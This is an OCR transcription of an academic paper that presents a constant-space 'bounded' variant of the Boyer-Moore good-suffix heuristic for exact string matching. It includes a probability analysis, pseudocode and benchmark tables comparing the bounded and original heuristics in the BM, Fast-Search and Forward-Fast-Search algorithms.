[5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40032, null]], "pdf_page_numbers": [[0, 123, 1], [123, 780, 2], [780, 3552, 3], [3552, 6286, 4], [6286, 9625, 5], [9625, 13205, 6], [13205, 16444, 7], [16444, 19866, 8], [19866, 23009, 9], [23009, 26380, 10], [26380, 29373, 11], [29373, 31549, 12], [31549, 34582, 13], [34582, 36688, 14], [36688, 38976, 15], [38976, 39865, 16], [39865, 39928, 17], [39928, 39968, 18], [39968, 40003, 19], [40003, 40032, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40032, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
7785109a82ce4c4dcde47e8425a28bf116817a19
|
A Space-Efficient Implementation of the Good-Suffix Heuristic
Domenico Cantone, Salvatore Cristofaro, and Simone Faro
Università di Catania, Dipartimento di Matematica e Informatica
Viale Andrea Doria 6, I-95125 Catania, Italy
{cantone | cristofaro | faro}@dmi.unict.it
Abstract. We present an efficient variation of the good-suffix heuristic, firstly introduced in the well-known Boyer-Moore algorithm for the exact string matching problem. Our proposed variant uses only constant space, retaining much the same time efficiency of the original rule, as shown by extensive experimentation.
Key words: string matching, experimental algorithms, text-processing, good-suffix rule, constant-space algorithms.
1 Introduction
Given a text $T$ and a pattern $P$ (of length $m$) over some alphabet $\Sigma$, the string matching problem consists in finding all occurrences of the pattern $P$ in the text $T$. It is a very extensively studied problem in computer science, mainly due to its direct applications to such diverse areas as text, image and signal processing, speech analysis and recognition, information retrieval, computational biology and chemistry, etc.
The most practical string matching algorithms show a sublinear behavior in practice, at the price of using extra memory of non-constant size to maintain auxiliary information. For instance, the Boyer-Moore algorithm [2] requires additional $O(m+|\Sigma|)$-memory to compute two tables of shifts, which implement the well-known good-suffix and bad-character heuristics. Other efficient variants of the Boyer-Moore algorithm use additional $O(m)$-space [7], or $O(|\Sigma|)$-space [14, 18], whereas, interestingly enough, two of the fastest algorithms require respectively $O(|\Sigma|^2)$-space [1] and $O(m \cdot |\Sigma|)$-space [5].
The first non-trivial constant-space string matching algorithm is due to Galil and Seiferas [10]. Their algorithm, though linear in the worst-case, was too complicated to be of any practical interest. Slightly more efficient constant-space algorithms have been subsequently reported in the literature (see [3, 8, 9, 11, 12]), and more recently two new constant-space algorithms have been presented, which have a sublinear average behavior though they are quadratic in the worst-case [6]. It is to be pointed out, though, that no constant-space algorithm which is competitive with the most efficient variants of the Boyer-Moore algorithm is known as yet.
Starting from the observation that most of the accesses to the good-suffix table are limited to very few locations, in this paper we propose a truncated good-suffix heuristic which require only constant-space and show by extensive experimentation that the Boyer-Moore algorithm and two of its more effective variants maintain much the same running times, when the truncated variant is used in place of the classical one.
The paper is organized as follows. In Section 2 we give some preliminary notions. Then, in Section 3 we describe the preprocessing techniques introduced in the Boyer-Moore algorithm together with some efficient variants which make use of the same shift heuristics. In Section 4 we estimate the probability that a given entry of a good-suffix table is accessed and, based on such analysis, we come up with the proposal to memorize only a constant number of entries. We also show how such entries can be computed in constant-space. Subsequently, in Section 5 we present the experimental data obtained by running under various conditions the algorithms reviewed, and their modified versions. Such results confirm experimentally that by truncating the good-suffix table much the same running times are maintained. Finally, our conclusions are given in Section 6.
2 Preliminaries
Before entering into details, we need a bit of notations and terminology. A string $P$ is represented as a finite array $P[0..m-1]$, with $m \geq 0$. In such a case we say that $P$ has length $m$ and write $\text{length}(P) = m$. In particular, for $m = 0$ we obtain the empty string, also denoted by $\varepsilon$. By $P[i]$ we denote the $(i+1)$-st character of $P$, for $0 \leq i < \text{length}(P)$. Likewise, by $P[i..j]$ we denote the substring of $P$ contained between the $(i+1)$-st and the $(j+1)$-st characters of $P$, where $0 \leq i \leq j < \text{length}(P)$. Moreover, for any $i, j \in \mathbb{Z}$, we put $P[i..j] = \varepsilon$ if $i > j$, and $P[i..j] = P[\max(i, 0) .. \min(j, \text{length}(P) - 1)]$ otherwise.
For any two strings $P$ and $P'$, we write $P' \sqsupset P$ to indicate that $P'$ is a suffix of $P$, i.e., $P' = P[i..\text{length}(P) - 1]$, for some $0 \leq i < \text{length}(P)$. Similarly, we write $P' \sqsubset P$ to indicate that $P'$ is a prefix of $P$, i.e., $P' = P[0..i-1]$, for some $0 \leq i \leq \text{length}(P)$. In addition, we denote by $P^R$ the reverse of the string $P$.
Let $T$ be a text of length $n$ and let $P$ be a pattern of length $m$. If the character $P[0]$ is aligned with the character $T[s]$ of the text, so that $P[i]$ is aligned with $T[s+i]$, for $i = 0, \ldots, m-1$, we say that the pattern $P$ has shift $s$ in $T$. In this case the substring $T[s..s+m-1]$ is called the current window of the text. If $T[s..s+m-1] = P$, we say that the shift $s$ is valid.
Most string matching algorithms have the following general structure:
\begin{verbatim}
Generic_String_Matcher(T, P)
1. Precompute_Globals(P)
2. n := length(T)
3. m := length(P)
4. s := 0
5. while $s \leq n - m$ do
6. j := Check_Shift(s, P, T)
7. s := s + Shift_Increment(s, P, T, j)
\end{verbatim}
where
- the procedure $\text{Precompute_Globals}(P)$ computes useful mappings, in the form of tables, which later may be accessed by the function $\text{Shift_Increment}(s, P, T)$;
- the function $\text{Check_Shift}(s, P, T)$ checks whether $s$ is a valid shift and returns the position $j$ of the last matched character in the pattern;
the function $\text{Shift\_Increment}(s, P, T, j)$ computes a positive shift increment according to the information tabulated by procedure $\text{Precompute\_Globals}(P)$ and to the position $j$ of the last matched character in the pattern.
Observe that for the correctness of procedure $\text{Generic\_String\_Matcher}$, it is plainly necessary that the shift increment $\Delta s$ computed by $\text{Shift\_Increment}(s, P, T)$ be safe, namely no valid shift may belong to the interval $\{s + 1, \ldots, s + \Delta s - 1\}$.
In the case of the naive string matching algorithm, for instance, the procedure $\text{Precompute\_Globals}$ is just dropped, procedure $\text{Check\_Shift}(s, P, T)$ checks whether the current shift is valid by scanning the pattern from left to right, and the function $\text{Shift\_Increment}(s, P, T, j)$ always returns a unitary shift increment.
3 The good-suffix heuristic for preprocessing
Information gathered during the execution of the $\text{Shift\_Increment}(s, P, T, j)$ function, in combination with the knowledge of $P$, as suitably extracted by procedure $\text{Precompute\_Globals}(P)$, can yield shift increments larger than 1 and ultimately lead to more efficient algorithms. In this section we focus our attention to the use of the good-suffix heuristic for preprocessing the pattern, introduced by Boyer and Moore in their celebrated algorithm [2].
The Boyer-Moore algorithm is the progenitor of several algorithmic variants which aim at computing close to optimal shift increments very efficiently. Specifically, the Boyer-Moore algorithm checks whether $s$ is a valid shift, by scanning the pattern $P$ from right to left and, at the end of the matching phase, it calls procedure $\text{Boyer-Moore\_Shift\_Increment}(s, P, T, j)$ to compute the shift increment, where $j$ is the position of last matched character in the pattern. Such procedure computes the shift increment as the maximum value suggested by the good-suffix heuristic and the bad-character heuristic below, using the functions $gs_P$ and $bc_P$ respectively, provided that both of them are applicable.
$$\text{Boyer-Moore\_Shift\_Increment}(s, P, T, j)$$
1. if $j > 0$ then
2. return $\max(gs_P(j), j - bc_P(T[s + j - 1]) - 1)$
3. return $gs_P(0)$
Let us briefly review the shifting strategy of the good-suffix and the bad-character heuristics.
If the last matching character occurs at position $j$ of the pattern $P$, the good-suffix heuristic suggests to align the substring $T[s + j .. s + m - 1] = P[j .. m - 1]$ with its rightmost occurrence in $P$ (preceded by a character different from $P[j - 1]$, provided that $j > 0$); this case is illustrated in Fig. 1A. If such an occurrence does not exist, the good-suffix heuristic suggests a shift increment which allows to match the longest suffix of $T[s + j .. s + m - 1]$ with a prefix of $P$; see Fig. 1B.
More formally, if the last matching character occurs at position $j$ of the pattern $P$, the good-suffix heuristic states that the shift can be safely incremented by $gs_P(j)$ positions, where
$$gs_P(i) = \min \{0 < k \leq m \mid P[i - k .. m - k - 1] \supseteq P \land (k \leq i - 1 \rightarrow P[i - 1] \neq P[i - 1 - k])\}$$,
Figure 1. The good-suffix heuristic. Assuming that the suffix $u = P[i+1..m-1]$ of the pattern $P$ has a match on the text $T$ at shift $s$ and that $P[i] \neq T[s+i]$, then the good-suffix heuristic attempts to align the substring $T[s+i+1..s+m-1] = P[i+1..m-1]$ with its rightmost occurrence in $P$ preceded by a character different from $P[i]$ (see (A)). If this is not possible, the good-suffix heuristic suggests a shift increment corresponding to the match between the longest suffix of $u$ with a prefix, $v$, of $P$ (see (B)).
for $i = 0, 1, \ldots, m$.
The bad-character heuristic states that if $c = T[s+j-1] \neq P[j-1]$ is the first mismatching character, while scanning $P$ and $T$ from right to left with shift $s$, then $P$ can be safely shifted in such a way that its rightmost occurrence of $c$, if present, is aligned with position $(s+j-1)$ in $T$. In the case in which $c$ does not occur in $P$, then $P$ can safely be shifted just past position $(s+j-1)$ in $T$. More formally, the shift increment suggested by the bad-character heuristic is given by the expression $(j - bc_P(T[s+j-1]) - 1)$, where
$$bc_P(c) = \text{def} \max\{0 \leq k < m \mid P[k] = c\} \cup \{-1\},$$
for $c \in \Sigma$, and where we recall that $\Sigma$ is the alphabet of the pattern $P$ and text $T$. Notice that in some situations the shift increment proposed by the bad-character heuristic may be negative.
It turns out that the functions $gs_P$ and $bc_P$ can be computed during the preprocessing phase in time $O(m)$ and $O(m + |\Sigma|)$ and space $O(m)$ and $O(|\Sigma|)$, respectively, and that the overall worst-case running time of the Boyer-Moore algorithm, as described above, is linear (cf. [13]).
Due to the simplicity and ease of implementation of the bad-character heuristic, some variants of the Boyer-Moore algorithm have focused just around it and dropped the good-suffix heuristic. This is the case, for instance, of the Horspool algorithm [14], which computes shift advancements by aligning the rightmost character $T[s+m-1]$ with its rightmost occurrence on $P[0..m-2]$, if present; otherwise it shifts the pattern just past the current window.
Similarly the Quick-Search algorithm [18] uses a modification of the original heuristics of the Boyer-Moore algorithm, much along the same lines of the Horspool algorithm. Specifically, it is based on the observation that the character $T[s+m]$ is always involved in testing for the next alignment, so that one can apply the bad-character heuristic to $T[s+m]$, rather than to the mismatching character, obtaining larger shift advancements.
A further example is given by the Berry-Ravindran algorithm [1], which extends the Quick-Search algorithm by using in the bad-character heuristic also the character $T[s+m+1]$ in addition to $T[s+m]$. In this case, the table used by the bad-character heuristic requires $O(|\Sigma|^2)$-space and $O(m + |\Sigma|^2)$-time complexity.
Experimental results show that the Berry-Ravindran algorithm is fast in practice and performs a low number of text/pattern character comparisons and that the Quick-Search algorithm is very fast especially for short patterns (cf. [16]).
The role of the good-suffix heuristic in practical string matching algorithms has recently been reappraised, also in consideration of the fact that often it is as effective as the bad-character heuristic, especially in the case of non-periodic patterns.
This is the case of the Fast-Search algorithm [4], a very simple, yet efficient, variant of the Boyer-Moore algorithm. The Fast-Search algorithm computes its shift increments by applying the bad-character heuristic if and only if a mismatch occurs during the first character comparison, namely, while comparing characters $P[m-1]$ and $T[s+m-1]$, where $s$ is the current shift. In all other cases it uses the good-suffix heuristic. This translates in the following pseudo-code:
```
Fast-Search(s, P, T, j)
1. m := length(P)
2. if j = m - 1 then
3. return bcP(T[s+m-1])
4. else
5. return gsP(j)
```
A more effective implementation of the Fast-Search algorithm is obtained by iterating the bad-character heuristic until the last character $P[m-1]$ of the pattern is matched correctly against the text, at which point it is known that $T[s+m-1] = P[m-1]$, so that the subsequent matching phase can start with the $(m-2)$-nd character of the pattern. At the end of the matching phase the good-suffix heuristic is applied to compute the shift increment.
Another example is the Forward-Fast-Search algorithm [5], which maintains the same structure of the Fast-Search algorithm, but is based upon a modified version of the good-suffix heuristic, called forward good-suffix heuristic, which uses a look-ahead character to determine larger shift advancements. More precisely, if the last matching character occurs at position $j \leq m - 1$ of the pattern $P$, the forward good-suffix heuristic suggests to align the substring $T[s+j..s+m-1]$ with its rightmost occurrence in $P$ preceded by a character different from $P[j-1]$. If such an occurrence does not exist, the forward good-suffix heuristic proposes a shift increment which allows to match the longest suffix of $T[s+j..s+m-1]$ with a prefix of $P$. This corresponds to advance the shift $s$ by $\overline{gsP}(j, T[s+m])$ positions, where
$$\overline{gsP}(i, c) = \text{Def} \min\{0 < k \leq m \mid P[i-k..m-k-1] \sqsupseteq P \wedge (k < i - 1 \rightarrow P[i-1] \neq P[i-1-k]) \wedge P[m-k] = c \} \cup \{m+1\},$$
for $i = 0, 1, \ldots, m$ and $c \in \Sigma$.
The forward good-suffix heuristic requires a table of size $m \cdot |\Sigma|$ which can be constructed in time $O(m \cdot \max(m, |\Sigma|))$.
Experimental results show that both the Fast-Search and the Forward-Fast-Search algorithms, though not linear, achieve very good results especially in the case of very short patterns or small alphabets.
4 Truncating the Good-Suffix Tables
Let us assume that we run the Boyer-Moore algorithm on a pattern \( P \) and a text \( T \). Then, at the end of each matching phase, the Boyer-Moore algorithm accesses the entry at position \( j > 0 \) in the good-suffix table if and only if the last matched character in the pattern occurs at position \( j \) of the pattern, i.e. if \( P[j..m-1] = T[s+j..s+m-1] \) and \( P[j-1] \neq T[s+j-1] \), where \( s \) is the current shift. Likewise, the Boyer-Moore algorithm accesses the entry at position \( j = 0 \) if and only if \( P[0..m-1] = T[s..s+m-1] \), i.e. if and only if \( s \) is a valid shift.
Therefore, it is intuitively expected that the probability to access an entry at position \( j \) of the good-suffix table becomes higher as the value of \( j \) increases. In other words, it is expected that entries on the right-hand side of the good-suffix table have (much) higher probability to be accessed than entries on the left end side.
The above considerations, which will be formalized below under suitable simplifying hypotheses, suggest that the initial segment of the good-suffix tables can be dropped, without affecting very much the performance of the algorithm. In fact, we will see that in most cases, it is enough to maintain just a few entries of the good-suffix tables.
For the sake of simplicity, in the following analysis we will assume that the text \( T \) and pattern \( P \) are strings over a common alphabet \( \Sigma \) of size \( \sigma \), randomly selected relatively to a uniform distribution.
Thus, for a shift \( 0 \leq s \leq n - m \) in \( T \) and a position \( 0 \leq j < m \) in \( P \), the probability that \( P[j] = T[s+j] \) is \( 1/\sigma \), whereas the probability that \( P[j] \neq T[s+j] \) is \((\sigma - 1)/\sigma\).
Therefore, the probability \( p_j \) that \( j \) is the position of the last matched character in the pattern \( P \), relatively to a shift \( s \) of the text, is given by
\[
p_j = \begin{cases}
\frac{\sigma - 1}{\sigma^{m-j+1}} & \text{if } 0 < j \leq m \\
1/\sigma^m & \text{if } j = 0
\end{cases}
\]
Plainly, \( p_j \) is also the probability that location \( j \) of the good-suffix table is accessed.
As experimental evidence of the above analysis, we report in Fig. 2 the plots of the accesses to each entry of the good-suffix table, for different sizes of the alphabet, when running the Fast-Search algorithm with a set of 200 patterns of length 40 and a 20Mb text buffer as input. More precisely, for each function \( f \) in Fig. 2, \( f(j) \) is the percentage of accesses to the entry at position \( m - j \) in the good-suffix table. We can observe that, in general, only a very small number of entries is really used during a computation and, in particular, when the alphabet size is greater than or equal to 16 about 98% of the accesses are limited to the last three entries of the table.
We can readily evaluate the number \( K_{\sigma,\beta} \) of entries of the good-suffix table which are accessed with probability greater than a fixed threshold \( 0 < \beta < 1 \), for an alphabet of size \( \sigma \). To begin with, notice that if \( p_j > \beta \), then \( \frac{\sigma - 1}{\sigma^{m-j+1}} > \beta \), so that
\[
j > m + 1 - \left\lfloor \log_\sigma \frac{\sigma - 1}{\beta} \right\rfloor, \quad \text{and} \quad m_{\sigma,\beta} \leq \left\lfloor \log_\sigma \frac{\sigma - 1}{\beta} \right\rfloor - 1.
\]
Observe that for \( \bar{\beta} = 10^{-4} \), we have \( K_{\sigma,\bar{\beta}} \leq 12 \). Additionally, we have \( K_{\sigma,\bar{\beta}} \leq 3 \), for \( 14 \leq \sigma \leq 39 \), and \( K_{\sigma,\bar{\beta}} \leq 2 \), for \( \sigma \geq 40 \). In other words, for alphabets of at
Figure 2. The percentage of accesses for each entry of the good-suffix heuristic, for different sizes of the alphabet. The values have been computed by running the Fast-Search algorithm with a set of 200 patterns, of length 40, and a 20Mb text buffer as input. The values in each curve \( f \) are relative to the inverted addressing of the entries, i.e. \( f(j) \) is the percentage of accesses to the entry at position \( m - j \).
Figure 3. The function \( \log \frac{\sigma}{\beta} - 1 \), for different values of the bound \( \beta \). Note that if the bound \( \beta \) is greater or equal to \( 10^{-4} \), then the number of entries accessed with probability greater than \( \beta \) is always no greater than 12 and in most cases no greater than 3.
At least 14 characters, at most the last three entries of the good-suffix table are accessed with probability at least \( 10^{-4} \) (under the assumption of uniform distribution). Fig. 3 shows the shape of the function \( \log \frac{\sigma}{\beta} - 1 \) for the following values of the bound \( \beta = 10^{-3}, 10^{-4}, \ldots, 10^{-10} \). Note that if the bound \( \beta \) is greater or equal to \( 10^{-4} \), then the number of entries accessed with probability greater than \( \beta \) is always no greater than 12 and in most cases no greater than 3.
4.1 The Bounded-Good-Suffix Heuristic
The above considerations justify the following bounded good-suffix heuristic. Let $\beta > 0$ be a fixed bound\(^1\) and let $K = \left\lceil \log_\sigma \frac{\sigma - 1}{\beta} \right\rceil - 1$, where, as usual, $\sigma$ denotes the size of the alphabet. Then the bounded good-suffix heuristic works as follows.
During a matching phase, if the first mismatch occurs at position $i$ of the pattern $P$ and $i \geq m - K$, the bounded good-suffix heuristic suggests that the pattern is shifted $g_{SP}(i + 1)$ positions to the right. Otherwise, if the first mismatch occurs at position $i$ of the pattern $P$, with $i < m - K$, or if the pattern $P$ matches the current window in the text, then the bounded good-suffix heuristic suggests that the pattern is shifted one position to the right.
More formally, if the first mismatch occurs at position $i$ of the pattern $P$, the bounded good-suffix heuristic suggests that the shift $s$ can be safely advanced $\beta g_{SP}(i - m + K)$ positions to the right, where, for $j = K - m - 1, \ldots, K - 1$, we have
$$
\beta g_{SP}(j) = \begin{cases}
g_{SP}(j + m - K + 1) & \text{if } j \geq 0 \\
1 & \text{otherwise}
\end{cases}
$$
Likewise, the bounded forward good-suffix heuristic suggests that when the first mismatch occurs at position $i$ of the pattern $P$, then the shift $s$ is advanced by $\overrightarrow{\beta g_{SP}(i - m + k, T[s + m])}$ positions to the right, where, for $j = K - m - 1, \ldots, K - 1$ and $c \in \Sigma$, we have
$$
\overrightarrow{\beta g_{SP}(j, c)} = \begin{cases}
\overrightarrow{g_{SP}(j + m - K + 1, c)} & \text{if } j \geq 0 \\
1 & \text{otherwise}
\end{cases}
$$
By way of example, when the bounded good-suffix heuristic is adopted in place of the good-suffix heuristic, the $\text{Shift\_Increment}$ procedure of the Boyer-Moore algorithm becomes:
\begin{verbatim}
\beta_{Boyer-Moore\_Shift\_Increment}(s, P, T, j, \sigma, \beta)
1. m := length(P)
2. K := \left\lceil \log_\sigma \frac{\sigma - 1}{\beta} \right\rceil - 1
3. if j \geq m - K - 1 then
4. if j > 0 then
5. return max(\beta g_{SP}(j - m + K - 1), j - bc_{P}(T[s + j - 1]))
6. else return \beta g_{SP}(0)
7. else if j > 0 then
8. return max(1, j - bc_{P}(T[s + j - 1]))
9. else return 1
\end{verbatim}
Next we discuss how the bounded good-suffix function $\beta g_{SP}$ can be constructed (analogous remarks apply for the bounded forward good-suffix function). A first very natural way to compute the function $\beta g_{SP}$ consists in computing a slightly modified version of the standard good-suffix function $g_{SP}$, and then keeping only the last $K$ entries of the function. However such procedure, based on the one firstly given in [2] and later corrected in [17], has $O(m)$-time and space complexity.
An alternative way to compute the bounded good-suffix function using only constant space, but still in $O(m)$ worst-case time, is given by procedure $\text{Precompute\_\beta gs}$, whose pseudo-code is presented below:
\(^1\) A good practical choice is $\beta = 10^{-4}$, as shown in Section 5.
Precompute\_βgs(P, σ, β)
1. \( m := \text{length}(P) \)
2. \( K := \left\lfloor \log_2 \frac{m}{\beta} \right\rfloor - 1 \)
3. for \( \ell := 0 \) to \( K - 1 \) do
4. \( j := m - 2 \)
5. repeat
6. \( q := j - \text{occur}(P_{m-\ell..m-1, P_{0, j}}) \)
7. \( j := q - 1 \)
8. until \( q < \ell \) or \( P[m-\ell - 1] \neq P[q-\ell] \)
9. \( \beta_{gs}(K - \ell - 1) := m - q - 1 \)
10. return \( \beta_{gs} \)
First of all, we give the specification of the function \( \text{occur} \), which is called by procedure \( \text{Precompute\_βgs} \). Given two strings \( X \) and \( Y \), \( \text{occur}(X, Y) \) computes the leftmost occurrence of \( X \) in \( Y \), i.e.,
\[
\text{occur}(X, Y) = \min\{ p \geq 0 \mid Y[p..p+|X|-1] = X \} \cup \{|Y|\}.
\]
Observe that the function \( \text{occur}(X, Y) \) can be computed by means of a linear-time string matching algorithm such as the Knuth-Morris-Pratt algorithm [15], thus requiring \( O(|X| + |Y|) \)-time and \( O(|X|) \) additional space.
We are now ready to explain how the procedure \( \text{Precompute\_βgs} \) works.
For \( \ell = 0, 1, \ldots, K - 1 \), the \( \ell \)-th iteration of the \( \text{for}\)-loop in line 3 finds the rightmost occurrence, \( P[q - \ell + 1..q] \), in \( P \) of its suffix of length \( \ell \) preceded by a character different from \( P[m - \ell - 1] \). If such an occurrence does not exist, the \( \ell \)-th iteration finds the rightmost position \( q < \ell \) in the pattern such that \( P[0..q] = P[m - q - 1..m - 1] \). More precisely, the search is performed within the \( \text{repeat}\)-loop in line 5, by means of repeated calls of type \( \text{occur}(P_{m - \ell..m - 1}^R, (P[0..j])^R) \), each of which looks for the leftmost occurrence of the reverse of \( P[m - \ell..m - 1] \) in the reverse of \( P[0..j] \). When such an occurrence is found at position \( q \), so that \( P[q - \ell + 1..q] \) is a suffix of \( P \), it is checked whether \( q < \ell \) holds or whether the character \( P[m - \ell - 1] \) is different from \( P[q - \ell] \). If any of such conditions is true, the \( \text{repeat}\)-loop stops, whereas if both conditions are false, another iteration is performed with \( j = q - 1 \).
The value \( q \), discovered during the \( \ell \)-th iteration of the \( \text{for}\)-loop in line 3, is then used in line 9 to set the \( (K - \ell - 1) \)-th entry of the \( \beta_{gs} \) function to \( m - q - 1 \).
Concerning the time and space analysis of the procedure \( \text{Precompute\_βgs} \), notice that each iteration of the \( \text{for}\)-loop, for \( \ell = 0, 1, \ldots, K - 1 \), takes \( O(K + m) \)-time, using only \( O(K) \)-space. Indeed, each call \( \text{occur}(P_{m-\ell..m-1}^R, P_{0, j}^R) \) in the \( \text{repeat}\)-loop takes time proportional to \( j - r \), where \( r = \text{occur}(P_{m-\ell..m-1}^R, P_{0, j}^R) \), and uses \( O(\ell) \) (reusable) space. Additionally, after each such call, the value of \( j \) is decreased by \( r + 1 \). Hence, the overall running time of all calls to the function \( \text{occur} \) made in the \( \text{repeat}\)-loop is bounded by \( O(K + m) \), for each iteration of the \( \text{for}\)-loop.
Since the number of iterations in the \( \text{for}\)-loop is \( K \), the overall running time of the procedure \( \text{Precompute\_βgs} \) is \( O(K^2 + Km) \).
Notice that if we fix the value of \( \beta = 10^{-4} \), then we have \( K \leq 12 \), as observed just before Section 4.1. Therefore, in such a case, the time and space complexity of the procedure \( \text{Precompute\_βgs} \) are \( O(1) \) and \( O(m) \), respectively.\(^2\)
\(^2\) As will be shown in Section 5, the choice \( \beta = 10^{-4} \) has very good practical results.
5 Experimental Results
To evaluate experimentally the impact of the bounded good-suffix heuristic, we have chosen to test it with the Boyer-Moore algorithm (in short, BM) and with two of its fastest variants in practice, namely the Fast-Search (FS) and the Forward-Fast-Search (FFS) algorithms. Their modified versions, obtained by using the bounded good-suffix heuristic in place of the good-suffix heuristic (in the case of the Boyer-Moore and the Fast-Search algorithms) and the bounded forward good-suffix heuristic in place of the forward good-suffix heuristic (in the case of the Forward-Fast-Search algorithm), are respectively denoted in short by $\beta$BM, $\beta$FS, and $\beta$FFS.
All algorithms have been implemented in the C programming language and were used to search for the same strings in large fixed text buffers on a PC with AMD Athlon processor of 1.19GHz. In particular, all algorithms have been tested on seven Rand$\sigma$ problems, for $\sigma = 2, 4, 8, 16, 32, 64, 128$, with patterns of length $m = 2, 4, 8, 10, 20, 40, 80$ and $160$, and on two real data problems.
Each Rand$\sigma$ problem consists in searching a set of 200 random patterns of a given length in a 20Mb random text over a common alphabet of size $\sigma$.
The tests on the real data problems have been performed on a 180Kb natural language text file, containing the “Hamlet” by William Shakespeare (NL), and on a 2.4Mb file containing a protein sequence from the human genome. In both cases, the patterns to be searched for have been constructed by selecting 200 random substrings of length $m$ from the files, for each $m = 2, 4, 8, 10, 20, 40, 80$ and $160$.
For the implementation of the bounded versions of the (forward) good-suffix heuristic we have used the bound $\beta = 10^{-4}$.
With the exception of the last two tables in which running times are expressed in thousandths of seconds, all other running times in the remaining tables are expressed in hundredths of seconds.
<table>
<thead>
<tr>
<th>$\sigma = 2$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>46.82</td>
<td>39.77</td>
<td>31.51</td>
<td>25.89</td>
<td>21.23</td>
<td>19.93</td>
<td>19.56</td>
<td>17.56</td>
<td>15.64</td>
</tr>
<tr>
<td>$\beta$BM</td>
<td>47.34</td>
<td>40.33</td>
<td>31.94</td>
<td>26.10</td>
<td>21.64</td>
<td>20.24</td>
<td>19.82</td>
<td>17.95</td>
<td>15.93</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>35.62</td>
<td>31.28</td>
<td>25.80</td>
<td>21.93</td>
<td>19.28</td>
<td>18.33</td>
<td>17.91</td>
<td>16.48</td>
<td>14.96</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>36.32</td>
<td>32.34</td>
<td>26.36</td>
<td>22.46</td>
<td>19.37</td>
<td>18.35</td>
<td>17.94</td>
<td>16.71</td>
<td>14.95</td>
</tr>
<tr>
<td><strong>FFS</strong></td>
<td>31.02</td>
<td>28.39</td>
<td>23.46</td>
<td>19.76</td>
<td>17.83</td>
<td>16.97</td>
<td>16.64</td>
<td>15.03</td>
<td>13.78</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>37.27</td>
<td>32.44</td>
<td>25.83</td>
<td>21.71</td>
<td>19.30</td>
<td>18.53</td>
<td>18.18</td>
<td>16.33</td>
<td>14.95</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand2 problem
<table>
<thead>
<tr>
<th>$\sigma = 4$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>38.84</td>
<td>28.41</td>
<td>23.23</td>
<td>21.04</td>
<td>20.15</td>
<td>19.30</td>
<td>18.95</td>
<td>17.70</td>
<td>16.42</td>
</tr>
<tr>
<td>$\beta$BM</td>
<td>39.09</td>
<td>28.58</td>
<td>23.35</td>
<td>21.29</td>
<td>20.30</td>
<td>19.54</td>
<td>19.10</td>
<td>17.87</td>
<td>16.52</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>26.08</td>
<td>21.15</td>
<td>18.95</td>
<td>18.14</td>
<td>17.64</td>
<td>17.07</td>
<td>16.70</td>
<td>15.91</td>
<td>14.84</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>26.56</td>
<td>21.49</td>
<td>19.17</td>
<td>18.30</td>
<td>17.65</td>
<td>17.12</td>
<td>16.72</td>
<td>16.02</td>
<td>14.93</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>26.61</td>
<td>21.18</td>
<td>18.68</td>
<td>17.66</td>
<td>16.70</td>
<td>16.30</td>
<td>16.02</td>
<td>14.55</td>
<td>13.35</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand4 problem
<table>
<thead>
<tr>
<th>$\sigma = 8$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>33.24</td>
<td>23.16</td>
<td>18.97</td>
<td>17.86</td>
<td>17.36</td>
<td>17.12</td>
<td>17.00</td>
<td>16.42</td>
<td>15.83</td>
</tr>
<tr>
<td>$\beta$BM</td>
<td>33.01</td>
<td>23.09</td>
<td>19.14</td>
<td>17.93</td>
<td>17.36</td>
<td>17.14</td>
<td>17.09</td>
<td>16.47</td>
<td>15.91</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>21.02</td>
<td>18.26</td>
<td>16.43</td>
<td>16.04</td>
<td>15.93</td>
<td>15.81</td>
<td>15.82</td>
<td>15.29</td>
<td>14.88</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>21.32</td>
<td>18.34</td>
<td>16.46</td>
<td>16.10</td>
<td>15.96</td>
<td>15.88</td>
<td>15.75</td>
<td>15.39</td>
<td>14.91</td>
</tr>
<tr>
<td><strong>FFS</strong></td>
<td>20.84</td>
<td>18.23</td>
<td>16.39</td>
<td>16.05</td>
<td>15.78</td>
<td>15.64</td>
<td>15.26</td>
<td>13.96</td>
<td>13.18</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>21.12</td>
<td>18.36</td>
<td>16.43</td>
<td>16.05</td>
<td>15.82</td>
<td>15.67</td>
<td>15.31</td>
<td>14.00</td>
<td>13.02</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand8 problem
The above experimental results show that the algorithms $\beta$BM, $\beta$FS, and $\beta$FFS have much the same running times of the algorithms BM, FS, and FFS. Only when the size of the alphabet is 2 the “bounded” versions have a slightly worse performance than their counterparts, especially for short patterns. On the other hand, as the size of the alphabet and pattern increases, often the “bounded” versions moderately
outperform their counterpart. In particular, this behavior is more noticeable in the case of the \textit{Forward-Fast-Search} algorithm and in the cases of the real data problems. The latter remark shows that our simplifying hypotheses in the analysis put forward in Section 4 do not lead to unrealistic results.
6 Conclusions
